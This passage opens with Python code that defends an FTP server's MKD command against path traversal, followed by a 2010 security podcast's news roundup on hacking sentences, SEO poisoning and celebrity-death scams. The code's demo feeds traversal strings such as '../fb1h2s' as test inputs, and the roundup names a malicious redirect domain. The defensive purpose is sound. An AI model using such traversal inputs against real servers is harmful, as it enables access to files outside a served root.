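def virtual_path(cwd: str, requested: str) -> str:
    """Resolve requested against the virtual cwd, where '/' is the served root.

    Walks the components with an explicit stack: a '..' that would pop past
    the root is an escape attempt and is rejected rather than silently
    clamped, so the event can be logged. Backslashes count as separators
    because the advisory's target ran on Windows, and NUL is rejected outright.
    """
    if "\0" in requested:
        raise TraversalError("NUL byte in path")
    requested = requested.replace("\\", "/")
    base = requested if requested.startswith("/") else cwd.rstrip("/") + "/" + requested
    parts: List[str] = []
    for comp in base.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                raise TraversalError("path escapes root: %r" % requested)
            parts.pop()
        else:
            parts.append(comp)
    return "/" + "/".join(parts)


def disk_path(root: str, vpath: str) -> str:
    """Map a validated virtual path onto the filesystem and re-check it.

    The second check goes through realpath so that a symlink inside the root
    pointing outside it cannot bypass the lexical walk above.
    """
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, vpath.lstrip("/")))
    inside = candidate == root_real or candidate.startswith(os.path.join(root_real, ""))
    if not inside:
        raise TraversalError("resolved path %r leaves root" % candidate)
    return candidate


def ftp_mkd_reply(root: str, cwd: str, arg: str) -> Tuple[int, str]:
    """Decide the reply to MKD without touching the disk: 257 on success, 550 on refusal."""
    try:
        vpath = virtual_path(cwd, arg)
        disk_path(root, vpath)
    except TraversalError as exc:
        return 550, "MKD refused: %s" % exc
    return 257, '"%s" directory would be created' % vpath


if __name__ == "__main__":
    for arg in ("incoming/new", "../fb1h2s", "..\\fb1h2s", "/a/../../x"):
        print(arg, "->", ftp_mkd_reply("/srv/ftp", "/", arg))
```

Two checks are deliberate: the lexical walk gives a clean, loggable refusal for the advisory's "../" form before anything touches the disk, and the realpath comparison covers what a string check cannot see, such as a symlink already present under the root.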

News Items of Interest:

News item 1: http://www.wired.com/threatlevel/2010/02/max-vision-sentencing/

Max Ray Vision, 37, was sentenced Friday to 13 years in federal prison for stealing nearly two million credit card numbers from banks, businesses and other hackers — in what is the longest hacking sentence in U.S. history.  He was also ordered to pay $27.5 million in restitution, and to serve five years under court supervision following his release, during which time he’ll be allowed to use computers only for legitimate employment or education.

Vision, who changed his name from Max Butler shortly before his arrest, ran an online forum for thousands of identity thieves called CardersMarket, where he sold credit card magstripe data to the underground for about $20 a card. He was caught with 1.8 million stolen credit card numbers belonging to a thousand different banks, who tallied the fraudulent charges on the cards at $86.4 million.

He faced up to life in prison under federal sentencing guidelines. But prosecutor Luke Dembosky on Friday recommended the significantly lower 13-year sentence, noting that Vision has provided substantial assistance to the government during his time in pre-trial custody.

Vision’s 13-year term is the longest U.S. hacking sentence, though that record likely will be eclipsed next month when confessed TJX hacker Albert Gonzalez faces the first of two sentencing hearings. One of Gonzalez’s plea agreements contemplates a term of 17 to 25 years in prison.

News item 2: http://www.reuters.com/article/idUSTRE61E3R420100215?type=sportsNews
A French judge issued an arrest warrant for an American cyclist on Monday, according to Reuters.  French judge Thomas Cassuto issued the international arrest warrant for Floyd Landis after an anti-doping computer laboratory had its computer system hacked.

It seems that Landis hacked into the lab’s computer systems to try to prove the laboratory was wrong.  In his court case, the one-time 2006 Tour de France winner presented to numerous sporting bodies many documents he allegedly obtained by hacking.   The judge traced a network of hackers back to the ringleader.

News item 3: http://isc.sans.org/diary.html?storyid=8239
SANS is reporting that they’ve received reports about the (sadly expected by now) search engine poisoning for various Olympics-related terms. For example, the name of the killed Georgian luge athlete is used to redirect unsuspecting users to fake anti-virus and other malicious content. The redirect is browser dependent. Firefox is usually redirected to “qooglesearch.com” (note the ‘q’ as first letter instead of a ‘g’). It is probably advisable to watch out for DNS requests for this domain to spot possible infections. Internet Explorer is redirected to a wide range of different domains which apparently are picked at random.

http://www.youtube.com/results?search_query=Gillian+Cooke&page=&utm_source=opensearch

News item 4: http://economy.kansascity.com/?q=node/6089
Internet scammers spread false rumors of actor Bill Cosby’s death on message boards to try to trick users into parting with their cash and personal details, according to Sophos Plc, a U.K. provider of security software.

After messages posted to blogs and on Twitter said he had died, the actor made a statement on his Web site assuring his fans he was still alive. Scammers had created Web sites that advertised the news to lure Web users to download fake antivirus software.

Fake Cosby reports are not the first such celebrity scare story to be used to lure Web users into parting with credit card details or accepting viruses. Earlier this year, Internet postings said Johnny Depp had died in a car accident in France and in 2004 California Governor Arnold Schwarzenegger was reported dead by scammers.
News item 5: http://blog.brickhousesecurity.com/2010/02/15/top-5-gps-knew/

So we all know the obvious reasons why GPS devices have become necessary in the average person’s life. Used to track packages, family members, and business assets, GPS trackers have become more and more commonplace. However, there are several uses for GPS tracking that you may never have heard about before.

1) Tracking Wildlife

If you think it’s hard to find where your house cat is napping on an arbitrary day, consider the difficulties associated with tracking wildlife. Animals can be monitored using GPS trackers for reasons that range from information gathering to human interest. For example, scientists recently used GPS trackers to observe the habits of Arctic wolves.

2) Bus Tracking/Schedules

As any commuter knows, the existence of a schedule does not correlate with the bus being on time all the time. In selected areas, commuters are now lucky to benefit from the improved convenience of mass transit thanks to GPS tracking. If the GPS tracking works for these communities, maybe in the future the systems will be expanded to include other areas and more commuters. Pike County recently began using Sprint’s GPS system to track school buses. Parents’ concerns over the safety of their children are now relieved, as the GPS system can tell in real time the location of the bus as well as its mileage and speed.

3) Tracking Alzheimer’s Patients

Anyone who has a loved one afflicted with Alzheimer’s Disease understands the worry and ramifications associated with wandering. Alzheimer’s can cause someone to wander and possibly forget their home address. Having patients wear GPS devices can help ensure their safety because loved ones or hospital faculty can log online and see exactly where the person is. To tap into this technology Indiana state legislature passed the Silver Alert Program over the summer of 2009. The Silver Alert program, similar to the Amber Alert but for the elderly with Alzheimer’s, is still in a testing phase.

4) Boat Races

Why would anyone think to put a GPS device in boats during a race? The participants know where they are headed (well, one would hope), so the GPS wouldn’t make sense in its primary purpose. In fact, Michigan.org cleverly thought to implant GPS devices so that they could broadcast the locations of over 200 boats in real-time.

5) Sports

Even the world of sports can benefit from GPS tracking. From protecting valuable possessions and important people to monitoring if the last hit an athlete took was one too many, the sports world is being transformed with the help of GPS systems. You can watch cycling events with GPS tracking so that you can see where your favorite (non-hacker) cyclist is located within the course or peloton.

News item 6:

A recent survey found the Top 10 office annoyances were:

  • Grumpy or moody colleagues (37 percent)
  • Slow computers (36)
  • Small talk/gossip in the office (19)
  • The use of office jargon or management-speak (18)
  • People speaking loudly on the phone (18)
  • Too much health and safety in the work place (16)
  • Poor toilet etiquette (16)
  • People not turning up for meetings on time or at all (16)
  • People not tidying up after themselves in the kitchen (15)
  • Too cold/cold air conditioning (15)

The most annoying jargon:

  • Thinking outside the box (21 percent)
  • Let’s touch base (20)
  • Blue sky thinking (19)
  • Blamestorming (16) (sitting down and working out whose fault something is)
  • Drill down to a more granular level (15) (Look into something in more detail)
  • Let’s not throw pies in the dark (15) (we need a plan rather than a haphazard approach)
  • I’ve got that on my radar (13)
  • Push the envelope (12)
  • Bring your A-game (11) (Be ready to do something to best of ability)
  • Get all your ducks in a row (11)
2010
02.15

Happy President’s Day

No podcast today due to Holiday.